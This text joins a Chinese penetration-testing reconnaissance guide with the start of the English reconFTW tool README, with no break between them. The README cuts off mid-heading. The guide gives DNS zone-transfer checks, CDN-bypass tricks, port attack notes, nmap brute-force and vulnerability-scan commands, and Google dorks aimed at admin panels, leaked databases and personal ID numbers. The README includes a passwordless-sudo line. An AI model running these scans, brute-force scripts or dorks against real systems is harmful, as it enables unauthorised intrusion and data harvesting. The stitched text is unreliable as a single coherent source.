项目地址:`https://github.com/Edu4rdSHL/findomain` 子域名收集:`findomain -t target.com` 使用所有API搜索子域并将数据导出到CSV文件:`findomain -t target.com -a -o csv` DNS历史解析 ----------- dnsdb https://www.dnsdb.io viewdns https://viewdns.info/ DNS域传送漏洞 ------------- 目前来看"DNS域传送漏洞"已经很少了。 ### DNS记录分类 常见的DNS记录有以下几类: A记录 IP地址记录,记录一个域名对应的IP地址 AAAA记录 IPv6地址记录,记录一个域名对应的IPv6地址 CNAME记录 别名记录,记录一个主机的别名 MX记录 电子邮件交换记录,记录一个邮件域名对应的IP地址 NS记录 域名服务器记录 ,记录该域名由哪台域名服务器解析 PTR记录 反向记录,也即从IP地址到域名的一条记录 TXT记录 记录域名的相关文本信息 ### DNS注册信息 Whois查询 ### DNS域传送漏洞原理 DNS服务器分为:`主服务器`、`备份服务器`和`缓存服务器`。在主备服务器之间同步数据库,需要使用`“DNS域传送”`。域传送是指备份服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。 若DNS服务器配置不当,可能导致攻击者获取某个域的所有记录。造成整个网络的拓扑结构泄露给潜在的攻击者,包括一些安全性较低的内部主机,如测试服务器。同时,黑客可以快速的判定出某个特定zone的所有主机,收集域信息,选择攻击目标,找出未使用的IP地址,绕过基于网络的访问控制。 ### DNS域传送漏洞检测 #### nslookup 基本过程 1) nslookup #进入交互式shell 2) server dns.xx.yy.zz #设定查询将要使用的DNS服务器 3) ls xx.yy.zz #列出某个域中的所有域名 4) exit #退出 漏洞检验-不存在漏洞 > nslookup Server: lkwifi.cn Address: 192.168.68.1 *** lkwifi.cn can't find nslookup: Non-existent domain > server ss2.bjfu.edu.cn Default Server: ss2.bjfu.edu.cn Address: 202.204.112.67 > ls bjfu.edu.cn [ss2.bjfu.edu.cn] *** Can't list domain bjfu.edu.cn: Query refused The DNS server refused to transfer the zone bjfu.edu.cn to your computer. If this is incorrect, check the zone transfer security settings for bjfu.edu.cn on the DNS server at IP address 202.204.112.67. > exit 漏洞检验-存在漏洞 > nslookup > server dns1.xxx.edu.cn > ls xxx.edu.cn ![image-20200114011710979](img/image-20200114011710979.png) #### nmap 利用nmap漏洞检测脚本"dns-zone-transfer"进行检测 nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxx.edu.cn -p 53 -Pn dns.xxx.edu.cn --script dns-zone-transfer 表示加载nmap漏洞检测脚本dns-zone-transfer.nse,扩展名.nse可省略 --script-args dns-zone-transfer.domain=xxx.edu.cn 向脚本传递参数,设置列出某个域中的所有域名 -p 53 设置扫描53端口 -Pn 设置通过Ping发现主机是否存活 ![image-20200114012409387](img/image-20200114012409387.png) #### dig 使用说明 `dig -h` 漏洞测试 dig @dns.xxx.edu.cn axfr xxx.edu.cn `axfr` 是q-type类型的一种: axfr类型是Authoritative Transfer的缩写,指请求传送某个区域的全部记录。 ![image-20200114014426896](img/image-20200114014426896.png) 查找真实IP ========== 如果挖掘的目标购买了CDN服务,可以直接ping目标的域名,但得到的并非真正的目标Web服务器,只是离我们最近的一台目标节点的CDN服务器,这就导致了我们没法直接得到目标的真实IP段范围。 CDN简介 ------- CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。 国内外CND --------- 国内常见CDN 阿里云 腾讯云 百度云 网宿科技(ChinanNet Center) 蓝汛 金山云 UCloud 网易云 世纪互联 七牛云 京东云等 国外常见CDN Akamai(阿卡迈) Limelight Networks(简称LLNW) AWS Cloud(亚马逊) Google(谷歌) Comcast(康卡斯特) 判断目标是否存在CDN ------------------- 由于CDN需要代价,一般小企业很大几率不会存在CDN服务。 假如一些企业存在CDN服务,那该如何寻找其真实IP呢,往下看,常见几种手法 ### Ping目标主域 通常通过ping目标主域,观察域名的解析情况,以此来判断其是否使用了CDN 对京东和阿里还有一家电器企业进行ping测试,观察域名的解析情况,可以看到京东和阿里都采用了自家CDN,而那个电器企业没有CDN服务 C:\Users\Qftm>ping www.jd.com C:\Users\Qftm>ping www.alibaba.com C:\Users\Qftm>ping www.dfle.com.cn ![image-20200116223711807](img/image-20200116223711807.png) ### Nslookup #### 不同DNS域名解析 不同DNS域名解析情况对比,判断其是否使用了CDN 不同DNS解析结果若不一样,很有可能存在CDN服务 C:\Users\Qftm>nslookup www.dfle.com.cn 8.8.8.8 C:\Users\Qftm>nslookup www.dfle.com.cn 114.114.114.114 ![image-20200116224543228](img/image-20200116224543228.png) λ Qftm >>>: nslookup www.baidu.com 8.8.8.8 λ Qftm >>>: nslookup www.baidu.com 114.114.114.114 ![image-20200116224657554](img/image-20200116224657554.png) #### nslookup默认解析 若解析结果有多个,很有可能存在CDN,相反,若解析结果有一个,可能不存在CDN(不能肯定) ![image-20200117010336098](img/image-20200117010336098.png) ### 全国Ping 利用全国多地区的ping服务器操作,然后对比每个地区ping出的IP结果,查看这些IP是否一致, 如果都是一样的,极有可能不存在CDN。如果IP大多不太一样或者规律性很强,可以尝试查询这些IP的归属地,判断是否存在CDN。 在线网址 Ping检测-站长工具 http://ping.chinaz.com/ 17CE https://www.17ce.com/ ipip https://tools.ipip.net/newping.php (支持国内、国外) #### 站长工具 测试目标:`www.jd.com` ![image-20200116231928176](img/image-20200116231928176.png) #### 17CE 测试目标:`www.baidu.com` ![image-20200116232053955](img/image-20200116232053955.png) #### IPIP ![image-20200117000550437](img/image-20200117000550437.png) ### 工具查询 这里工具只能作为辅助,有一定误报的概率,只能作为参考 #### Cdnplanet cdnplanet https://www.cdnplanet.com/tools/cdnfinder/ (查询可能比较慢) ![image-20200117001109853](img/image-20200117001109853.png) 绕过CDN查找真实IP ----------------- 在确认了目标确实用了CDN以后,就需要绕过CDN寻找目标的真实IP,下面介绍一些常规的方法。 ### 内部邮箱源 一般的邮件系统都在内部,没有经过CDN的解析,通过利用目标网站的邮箱注册、找回密码或者RSS订阅等功能,查看邮件、寻找邮件头中的邮件服务器域名IP,ping这个邮件服务器的域名,就可以获得目标的真实IP。 注意:必须是目标自己的邮件服务器,第三方或公共邮件服务器是没有用的。 ![image-20200117013346488](img/image-20200117013346488.png) ### 国外请求 很多时候国内的CDN对国外得覆盖面并不是很广,故此可以利用此特点进行探测。通过国外代理访问就能查看真实IP了,或者通过国外的DNS解析,可能就能得到真实的IP。 #### 国际Ping 国际ping测试站点 ipip https://tools.ipip.net/newping.php ASM https://asm.ca.com/en/ping.php 测试站点:`www.yeah.net` ![image-20200117015215656](img/image-20200117015215656.png) #### 国外DNS解析 世界各地DNS服务器地址大全:`http://www.ab173.com/dns/dns_world.php` 测试站点:`www.yeah.net` 美国加利福尼亚州山景市谷歌公司DNS服务器: `8.8.4.4` ![image-20200117020409356](img/image-20200117020409356.png) ### 分站域名&C段查询 很多网站主站的访问量会比较大,所以主站都是挂CDN的,但是分站可能没有挂CDN,可以通过ping二级域名获取分站IP, 可能会出现分站和主站不是同一个IP但在同一个C段下面的情况,从而能判断出目标的真实IP段。 #### 分站域名 具体见上面**`<收集子域名信息>`{=html}**部分 ![image-20200117021634541](img/image-20200117021634541.png) #### C段查询 - 在线查询 ```{=html} <!-- --> ``` https://phpinfo.me/bing.php ![image-20200117023131460](img/image-20200117023131460.png) - 工具 `K8_C段旁注工具6.0`、`nmap`、`IISPutScanner`、`小米范WEB查找器` 等 `小米范WEB查找器`:http://pan.baidu.com/s/1pLjaQKF ![image-20200118204326521](img/image-20200118204326521.png) - 网络资产搜索引擎 Fofa、Shodan、ZoomEye 利用这些网络空间资产搜索引擎来搜索暴露在外的端口信息 利用语法搜索C段信息 ![image-20200118195928257](img/image-20200118195928257.png) ### 网站漏洞 通过网站的信息泄露如phpinfo泄露,github信息泄露,命令执行等漏洞获取真实ip。 #### 一些测试文件 phpinfo、test等 ![image-20200118003823377](img/image-20200118003823377.png) #### SSRF漏洞 服务器主动向外发起连接,找到真实IP地址 ### 查询域名解析记录 一般网站从部署开始到使用cdn都有一个过程,周期如果较长的话 则可以通过这类历史解析记录查询等方式获取源站ip,查看IP与域名绑定的历史记录,可能会存在使用CDN前的记录。 在线网站查询 dnsdb https://www.dnsdb.io NETCRAFT https://sitereport.netcraft.com/?url= viewdns https://viewdns.info/ threatbook https://x.threatbook.cn/ securitytrails https://securitytrails.com/ ![image-20200118005552633](img/image-20200118005552633.png) ### 目标网站APP应用 如果目标网站有自己的App,可以尝试利用Fiddler或Burp Suite抓取App的请求,从里面找到目标的真实IP。 ### 网络空间引擎搜索 shodan、FOFA、zoomeye 收集常用端口信息 ================ 在对目标进行漏洞挖掘的过程中,对端口信息的收集是一个很重要的过程, 通过扫描服务器开放的端口以及从该端口判断服务器上存在的服务,就可以对症下药,便于我们渗透目标服务器。 所以在端口渗透信息的收集过程中,我们需要关注常见应用的默认端口和在端口上运行的服务。 端口一般是指TCP/IP协议中的端口,端口号的范围是从0-65535。 常见端口&解析&总结 ------------------ 常用的端口利用及解析总结 端口:21 服务:FTP/TFTP/VSFTPD 总结:爆破/嗅探/溢出/后门 端口:22 服务:ssh远程连接 总结:爆破/openssh漏洞 端口:23 服务:Telnet远程连接 总结:爆破/嗅探/弱口令 端口:25 服务:SMTP邮件服务 总结:邮件伪造 端口:53 服务:DNS域名解析系统 总结:域传送/劫持/缓存投毒/欺骗 端口:67/68 服务:dhcp服务 总结:劫持/欺骗 端口:110 服务:pop3 总结:爆破/嗅探 端口:139 服务:Samba服务 总结:爆破/未授权访问/远程命令执行 端口:143 服务:Imap协议 总结:爆破161SNMP协议爆破/搜集目标内网信息 端口:389 服务:Ldap目录访问协议 总结:注入/未授权访问/弱口令 端口:445 服务:smb 总结:ms17-010/端口溢出 端口:512/513/514 服务:Linux Rexec服务 总结:爆破/Rlogin登陆 端口:873 服务:Rsync服务 总结:文件上传/未授权访问 端口:1080 服务:socket 总结:爆破 端口:1352 服务:Lotus domino邮件服务 总结:爆破/信息泄漏 端口:1433 服务:mssql 总结:爆破/注入/SA弱口令 端口:1521 服务:oracle 总结:爆破/注入/TNS爆破/反弹shell2049Nfs服务配置不当 端口:2181 服务:zookeeper服务 总结:未授权访问 端口:2375 服务:docker remote api 总结:未授权访问 端口:3306 服务:mysql 总结:爆破/注入 端口:3389 服务:Rdp远程桌面链接 总结:爆破/shift后门 端口:4848 服务:GlassFish控制台 总结:爆破/认证绕过 端口:5000 服务:sybase/DB2数据库 总结:爆破/注入/提权 端口:5432 服务:postgresql 总结:爆破/注入/缓冲区溢出 端口:5632 服务:pcanywhere服务 总结:抓密码/代码执行 端口:5900 服务:vnc 总结:爆破/认证绕过 端口:6379 服务:Redis数据库 总结:未授权访问/爆破 端口:7001/7002 服务:weblogic 总结:java反序列化/控制台弱口令 端口:80/443 服务:http/https 总结:web应用漏洞/心脏滴血 端口:8069 服务:zabbix服务 总结:远程命令执行/注入 端口:8161 服务:activemq 总结:弱口令/写文件 端口:8080/8089 服务:Jboss/Tomcat/Resin 总结:爆破/PUT文件上传/反序列化 端口:8083/8086 服务:influxDB 总结:未授权访问 端口:9000 服务:fastcgi 总结:远程命令执行 端口:9090 服务:Websphere 总结:控制台爆破/java反序列化/弱口令 端口:9200/9300 服务:elasticsearch 总结:远程代码执行 端口:11211 服务:memcached 总结:未授权访问 端口:27017/27018 服务:mongodb 总结:未授权访问/爆破 详细参考:[掘安攻防实验室](https://mp.weixin.qq.com/s/Y0PPqyHysBPmgmDw2KmHYw) 扫描工具 -------- ### 常用扫描工具 Nmap Masscan ZMap 御剑高速TCP端口扫描工具 御剑高速端口扫描工具 IISPutScanner IISPutScanner增强版-DotNetScan v1.1 Beta masnmapscan ### 常用扫描工具使用 #### nmap 项目地址:`https://github.com/nmap/nmap` - 扫描多个IP ```{=html} <!-- --> ``` 扫描整个子网 nmap 192.168.6.1/24 nmap 192.168.1.1/16 nmap 192.168.1-30.1-254 nmap 192.168.1-254.6 扫描多个主机 namp 192.168.6.2 192.168.6.6 扫描一个小范围 nmap 192.168.6.2-10 扫描txt内的ip列表 nmap -iL text.txt 扫描除某个目标外 nmap 192.168.6.1/24 -exclude 192.168.6.25 - 绕过Firewalld扫描主机端口 通过不同的协议(TCP半连接、TCP全连接、ICMP、UDP等)的扫描绕过Firewalld的限制 nmap -sP 192.33.6.128 nmap -sT 192.33.6.128 nmap -sS 192.33.6.128 nmap -sU 192.33.6.128 nmap -sF 192.33.6.128 nmap -sX 192.33.6.128 nmap -sN 192.33.6.128 - 初步扫描端口信息 ```{=html} <!-- --> ``` nmap -T4 -A -v -Pn 192.168.1.1/24 -p 21,22,23,25,80,81,82,83,88,110,143,443,445,512,513,514,1433,1521,2082,2083,2181,2601,2604,3128,3306,3389,3690,4848,5432,5900,5984,6379,7001,7002,8069,8080,8081,8086,8088,9200,9300,11211,10000,27017,27018,50000,50030,50070 -oN nmap_result.txt - 扫描端口并且标记可以爆破的服务 ```{=html} <!-- --> ``` nmap 127.0.0.1 --script=ftp-brute,imap-brute,smtp-brute,pop3-brute,mongodb-brute,redis-brute,ms-sql-brute,rlogin-brute,rsync-brute,mysql-brute,pgsql-brute,oracle-sid-brute,oracle-brute,rtsp-url-brute,snmp-brute,svn-brute,telnet-brute,vnc-brute,xmpp-brute ![image-20200118144836852](img/image-20200118144836852.png) - 判断常见的漏洞并扫描端口 ```{=html} <!-- --> ``` nmap 127.0.0.1 --script=auth,vuln ![image-20200118145529395](img/image-20200118145529395.png) - 精确判断漏洞并扫描端口 ```{=html} <!-- --> ``` nmap 127.0.0.1 --script=dns-zone-transfer,ftp-anon,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,http-backup-finder,http-cisco-anyconnect,http-iis-short-name-brute,http-put,http-php-version,http-shellshock,http-robots.txt,http-svn-enum,http-webdav-scan,iis-buffer-overflow,iax2-version,memcached-info,mongodb-info,msrpc-enum,ms-sql-info,mysql-info,nrpe-enum,pptp-version,redis-info,rpcinfo,samba-vuln-cve-2012-1182,smb-vuln-ms08-067,smb-vuln-ms17-010,snmp-info,sshv1,xmpp-info,tftp-enum,teamspeak2-version #### Masscan 项目地址:`https://github.com/robertdavidgraham/masscan` Masscan主要是真对全网进行端口扫描 #### Zmap 项目地址:`https://github.com/zmap/zmap` Zmap主要是真对全网进行端口扫描 #### 御剑高速TCP端口扫描工具 ![image-20200118151614291](img/image-20200118151614291.png) #### 御剑高速端口扫描工具 ![image-20200118151708220](img/image-20200118151708220.png) #### masnmapscan 项目地址:`https://github.com/hellogoldsnakeman/masnmapscan-V1.0` masnmapscan整合了masscan和nmap两款扫描器,masscan扫描端口,nmap扫描端口对应服务,二者结合起来实现了又快又好地扫描。并且加入了针对目标资产有防火墙的应对措施。 ### 网络空间引擎搜索 shodan、FOFA、zoomeye FOFA为例 https://fofa.so/ ![image-20200118155703279](img/image-20200118155703279.png) ### 浏览器插件 通过Google、FireFox等插件的使用,收集主机端口开放信息 #### Shodan ![image-20200118155959933](img/image-20200118155959933.png) #### TCPIPUTILS ![image-20200118160743876](img/image-20200118160743876.png) #### DNSlytics ![image-20200118161017747](img/image-20200118161017747.png) 指纹识别 ======== 在漏洞挖掘中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。 CMS (Content Management System)又称整站系统或文章系统。常见的CMS有Dedecms (织梦)、Discuz、 PHPWEB、 PHPWind、PHPCMS、ECShop、 Dvbbs、 SiteWeaver、 ASPCMS、帝国、Z- Blog、WordPress等。 第三方平台 ---------- 云悉 http://www.yunsee.cn/ TideFinger http://finger.tidesec.net/ BugScaner http://whatweb.bugscaner.com/look/ 数字观星 https://fp.shuziguanxing.com/\#/ ![image-20200114232340764](img/image-20200114232340764.png) 工具 ---- 常用指纹识别工具有:`御剑Web指纹识别`、`WhatWeb`、`Test404轻量CMS指纹识别+v2.1`、`椰树`等,可以快速识别一些主流CMS ![image-20200114234807689](img/image-20200114234807689.png) Github项目 [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) [CMSmap](https://github.com/Dionach/CMSmap) [ACMSDiscovery](https://github.com/aedoo/ACMSDiscovery) [TideFinger](https://github.com/TideSec/TideFinger) [AngelSword](https://github.com/Lucifer1993/AngelSword) 浏览器插件 ---------- 通过Google、FireFox等插件的使用,收集网站结构信息 ### Wappalyzer ![image-20200118160258717](img/image-20200118160258717.png) 收集敏感信息 ============ WAF识别 ------- 识别网站使用的什么WAF,可以去找相应的绕过手段 ### wafw00f 项目地址:https://github.com/EnableSecurity/wafw00f ![image-20200119014304387](img/image-20200119014304387.png) 源码泄露 -------- ### 常见源码泄露 /.bzr/ /CVS/Entries /CVS/Root /.DS_Store MacOS自动生成 /.hg/ /.svn/ (/.svn/entries) /.git/ /WEB-INF/src/ /WEB-INF/lib/ /WEB-INF/classes/ /WEB-INF/database.properties /WEB-INF/web.xml Robots.txt 上述源码泄露在Github上都可以找到相应的利用工具 ### 源码泄露扫描工具 将常见源码泄露加入字典配合FUZZ、御剑等扫描器进行扫描收集 ### 源码泄露利用工具 .git源码泄露:https://github.com/lijiejie/GitHack .DS\_Store泄露:https://github.com/lijiejie/ds\_store\_exp .bzr、CVS、.svn、.hg源码泄露:https://github.com/kost/dvcs-ripper 备份文件泄露 ------------ ### 网站备份文件泄露常见名称 backup db data web wwwroot database www code test admin user sql ### 网站备份文件泄露常见后缀 .bak .html _index.html .swp .rar .txt .zip .7z .sql .tar.gz .tgz .tar ### 网站备份文件泄露扫描工具 常见扫描工具有:Test404网站备份文件扫描器 v2.0、ihoneyBakFileScan等 ihoneyBakFileScan v0.2 多进程批量网站备份文件泄露扫描工具,根据域名自动生成相关扫描字典,自动记录扫描成功的备份地址到文件 ![image-20200118221937977](img/image-20200118221937977.png) Google Hacking -------------- ### 常用GoogleHacking语法 1、intext:(仅针对Google有效) 把网页中的正文内容中的某个字符作为搜索的条件 2、intitle: 把网页标题中的某个字符作为搜索的条件 3、cache: 搜索搜索引擎里关于某些内容的缓存,可能会在过期内容中发现有价值的信息 4、filetype/ext: 指定一个格式类型的文件作为搜索对象 5、inurl: 搜索包含指定字符的URL 6、site: 在指定的(域名)站点搜索相关内容 ### 其他GoogleHacking语法 1、引号 '' \" 把关键字打上引号后,把引号部分作为整体来搜索 2、or 同时搜索两个或更多的关键字 3、link 搜索某个网站的链接 link:baidu.com即返回所有和baidu做了链接的URL 4、info 查找指定站点的一些基本信息 ### GoogleHacking典型用法 - 管理后台地址 ```{=html} <!-- --> ``` site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | system site:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backend site:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录 - 上传类漏洞地址 ```{=html} <!-- --> ``` site:target.com inurl:file site:target.com inurl:upload - 注入页面 ```{=html} <!-- --> ``` site:target.com inurl:php?id= - 编辑器页面 ```{=html} <!-- --> ``` site:target.com inurl:ewebeditor - 目录遍历漏洞 ```{=html} <!-- --> ``` site:target.com intitle:index.of - SQL错误 ```{=html} <!-- --> ``` site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:”Warning: mysql_query()" | intext:”Warning: pg_connect()" - phpinfo() ```{=html} <!-- --> ``` site:target.com ext:php intitle:phpinfo "published by the PHP Group" - 配置文件泄露 ```{=html} <!-- --> ``` site:target.com ext:.xml | .conf | .cnf | .reg | .inf | .rdp | .cfg | .txt | .ora | .ini - 数据库文件泄露 ```{=html} <!-- --> ``` site:target.com ext:.sql | .dbf | .mdb | .db - 日志文件泄露 ```{=html} <!-- --> ``` site:target.com ext:.log - 备份和历史文件泄露 ```{=html} <!-- --> ``` site:target.com ext:.bkf | .bkp | .old | .backup | .bak | .swp | .rar | .txt | .zip | .7z | .sql | .tar.gz | .tgz | .tar - 公开文件泄露 ```{=html} <!-- --> ``` site:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv - 邮箱信息 ```{=html} <!-- --> ``` site:target.com intext:@target.com site:target.com 邮件 site:target.com email - 社工信息 ```{=html} <!-- --> ``` site:target.com intitle:账号 | 密码 | 工号 | 学号 | 身份证 JS获取敏感接口 -------------- ### JSFinder JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。 - 安装 ```{=html} <!-- --> ``` pip3 install requests bs4 git clone https://github.com/Threezh1/JSFinder.git - 使用 ```{=html} <!-- --> ``` python3 JSFinder.py -u http://www.mi.com python3 JSFinder.py -u http://www.mi.com -d ### LinkFinder 该工具通过网站中的JS文件来发现服务端、敏感信息、隐藏控制面板的URL链接等有用信息,可最大化地提高URL发现效率 - 安装 ```{=html} <!-- --> ``` git clone https://github.com/GerbenJavado/LinkFinder.git cd LinkFinder python2 setup.py install - 使用 在线JavaScript文件中查找端点的最基本用法,并将结果输出到results.html: python linkfinder.py -i https://example.com/1.js -o results.html CLI输出(不使用jsbeautifier,这使得它非常快): pyhon linkfinder.py -i https://example.com/1.js -o cli 分析整个域及其JS文件: python linkfinder.py -i https://example.com -d Burp输入(在目标中选择要保存的文件,右键单击,Save selected items将该文件作为输入): python linkfinder.py -i burpfile -b 枚举JavaScript文件的整个文件夹,同时查找以/ api /开头的终结点,并最终将结果保存到results.html: python linkfinder.py -i 'Desktop/*.js' -r ^/api/ -o results.html 目录&后台扫描 ------------- 常用工具-自己 7kbscan-WebPathBrute https://github.com/7kbstorm/7kbscan-WebPathBrute DirMap https://github.com/H4ckForJob/dirmap dirsearch https://github.com/maurosoria/dirsearch Fuzz-gobuster https://github.com/OJ/gobuster Test404轻量后台扫描器+v2.0 御剑 工具无论再多再好,没有一个好的字典一切都是空谈。强大字典是需要自己平时慢慢的积累。 越权查询 -------- 遍历uid获得身份信息等 代码托管 -------- 通过代码托管平台搜索敏感信息(内部邮箱账号密码、数据库账号密码等) - github GitHub是一个面向开源及私有软件项目的托管平台。 平台地址:https://github.com/ GitHub敏感信息泄露一直是企业信息泄露和知识产权泄露的重灾区,安全意识薄弱的同事经常会将公司的代码、各种服务的账户等极度敏感的信息『开源』到github中,github也是黑、白帽子、安全工程师的必争之地。 Github泄露扫描系统开发:https://sec.xiaomi.com/article/37 在GitHub中一般通过搜索网站域名、网站JS路径、网站备案、网站下的技术支持等进行敏感信息查询 - gitee 平台地址:https://gitee.com/ 码云:开源中国出品的代码托管、协作开发平台。 - gitcafe GitCafe一个基于代码托管服务打造的技术协作与分享平台 Whois&备案查询 -------------- 通过Whois和备案查询得到网站的注册人、手机号、邮箱等(对后续的密码生成和社工很有帮助) 公网网盘 -------- 公司员工可能把一些内部资料放在了公网网盘,然后被在线云网盘搜索的网站抓取了,我们就可以利用这个来对目标系统进行深入挖掘。 可以利用云网盘搜索工具搜集敏感文件,一般直接输入厂商名字进行搜索 ### 凌风云搜索 地址:https://www.lingfengyun.com/ ![image-20200119010745229](img/image-20200119010745229.png) 网站截图 -------- 对目标网站页面进行截图,通过截图找到敏感页面 ### webscreenshot 基于[`url-to-image`](https://github.com/kimmobrunfeldt/url-to-image/)的网站截图工具 - 安装 ```{=html} <!-- --> ``` git clone https://github.com/maaaaz/webscreenshot.git apt-get update && apt-get -y install phantomjs phantomjs -v Ubuntu 16 中安装 phantomjs 出现 QXcbConnection 问题 export QT_QPA_PLATFORM=offscreen export QT_QPA_FONTDIR=/usr/share/fonts - 使用 ```{=html} <!-- --> ``` cd webscreenshot/ python2.7 webscreenshot.py -i url.txt 获取公开文件 ------------ ### snitch Snitch可以针对指定域自动执行信息收集过程。此工具可帮助收集可通过Web搜索引擎找到的指定信息。在渗透测试的早期阶段,它可能非常有用。 - 安装 ```{=html} <!-- --> ``` git clone https://github.com/Smaash/snitch.git - 使用 ```{=html} <!-- --> ``` python2.7 snitch.py -C "site:whitehouse.gov filetype:pdf" -P 100 ### Google Hacking site: target.com filetype:doc|docx|xls|xlsx|ppt|pptx|zip|rar|sql 邮箱信息收集 ------------ ### Infoga Infoga可从不同的公共源网络(搜索引擎,pgp密钥服务器和shodan)收集电子邮件帐户信息(ip,主机名,国家/地区...)。是一个用法非常简单的工具,但是,对于渗透测试的早期阶段,或者只是为了了解自己公司在互联网上的可见性是非常有效的。 - 安装 ```{=html} <!-- --> ``` git clone https://github.com/m4ll0k/Infoga.git /data/infoga cd /data/infoga pip3 install requests python3 infoga.py - 使用 ```{=html} <!-- --> ``` python3 infoga.py --domain site.com --source all -v 3 | grep Email | cut -d ' ' -f 3 | uniq | sed -n '/-/!p' python3 infoga.py --info [email protected] python3 infoga.py --info [email protected] -b ### Google Hacking site:target.com intext:@target.com site:target.com 邮件 site:target.com email 历史漏洞&资产 ============= 很多时候去查看目标的历史漏洞和资产信息,往往能够得到很多有价值的信息。 乌云漏洞库:https://github.com/hanc00l/wooyun\_public Exploit-db:https://www.exploit-db.com/ Securityfocus:https://www.securityfocus.com/bid Packetstorm:https://packetstormsecurity.org/ Cxsecurity:https://cxsecurity.com/exploit/ 国家信息安全漏洞库:http://www.cnnvd.org.cn/ Seebug:https://www.seebug.org/ 等。。。
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.6"> <img src="https://img.shields.io/badge/release-v2.6-green"> </a> </a> <a href="https://opensource.org/licenses/MIT"> <img src="https://img.shields.io/badge/License-MIT-yellow.svg"> </a> <a href="https://twitter.com/Six2dez1"> <img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue"> </a> <a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg"> </a> <a href="https://github.com/six2dez/reconftw/wiki"> <img src="https://img.shields.io/badge/doc-wiki-blue.svg"> </a> <a href="https://t.me/joinchat/H5bAaw3YbzzmI5co"> <img src="https://img.shields.io/badge/[email protected]"> </a> <a href="https://discord.gg/R5DdXVEdTy"> <img src="https://img.shields.io/discord/1048623782912340038.svg?logo=discord"> </a> </p> <h3 align="center">Summary</h3> **reconFTW** automates the entire process of reconnaissance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. reconFTW uses a lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you to get the maximum and the most interesting subdomains so that you be ahead of the competition. It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target. So, what are you waiting for? Go! Go! Go! :boom: ## 📔 Table of Contents ----------------- - [⚙️ Config file](#️-config-file) - [Usage](#usage) - [TARGET OPTIONS](#target-options) - [MODE OPTIONS](#mode-options) - [GENERAL OPTIONS](#general-options) - [Example Usage](#example-usage) - [To perform a full recon on single target](#to-perform-a-full-recon-on-single-target) - [To perform a full recon on a list of targets](#to-perform-a-full-recon-on-a-list-of-targets) - [Perform full recon with more time intense tasks *(VPS intended only)*](#perform-full-recon-with-more-time-intense-tasks-vps-intended-only) - [Perform recon in a multi domain target](#perform-recon-in-a-multi-domain-target) - [Perform recon with axiom integration](#perform-recon-with-axiom-integration) - [Perform all steps (whole recon + all attacks) a.k.a. YOLO mode](#perform-all-steps-whole-recon--all-attacks-aka-yolo-mode) - [Show help section](#show-help-section) - [Axiom Support :cloud:](#axiom-support-cloud) - [Sample video](#sample-video) - [:fire: Features :fire:](#fire-features-fire) - [Osint](#osint) - [Subdomains](#subdomains) - [Hosts](#hosts) - [Webs](#webs) - [Vulnerability checks](#vulnerability-checks) - [Extras](#extras) - [Mindmap/Workflow](#mindmapworkflow) - [Data Keep](#data-keep) - [Makefile](#makefile) - [Manual](#manual) - [Main commands](#main-commands) - [How to contribute](#how-to-contribute) - [Need help? :information\_source:](#need-help-information_source) - [Support this project](#support-this-project) - [Buymeacoffee](#buymeacoffee) - [DigitalOcean referral link](#digitalocean-referral-link) - [GitHub sponsorship](#github-sponsorship) - [Thanks :pray:](#thanks-pray) - [Disclaimer](#disclaimer) ----------------- ## 💿 Installation ## a) Using a PC/VPS/VM > You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book: - Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**) Important: if you are not running reconftw as root, run `sudo echo "${USERNAME} ALL=(ALL:ALL) NOPASSWD: ALL" | sudo tee -a /etc/sudoers.d/reconFTW`, to make sure no sudo prompts are required to run the tool and to avoid any permission issues. ```bash git clone https://github.com/six2dez/reconftw cd reconftw/ ./install.sh ./reconftw.sh -d target.com -r ``` ## b) Docker Image 🐳 (3 options) - Pull the image ```bash docker pull six2dez/reconftw:main ``` - Run the container ```bash docker run -it --rm \ -v "${PWD}/OutputFolder/":'/reconftw/Recon/' \ six2dez/reconftw:main -d example.com -r ``` - View results (they're NOT in the Docker container) - As the folder you cloned earlier (named `reconftw`) is being renamed to `OutputFolder`, you'll have to go to that folder to view results. If you wish to: 1. Dynamically modify the behaviour & function of the image 2. Build your own container 3. Build an Axiom Controller on top of the official image Please refer to the [Docker](https://github.com/six2dez/reconftw/wiki/4.-Docker) documentation. ## c) Terraform + 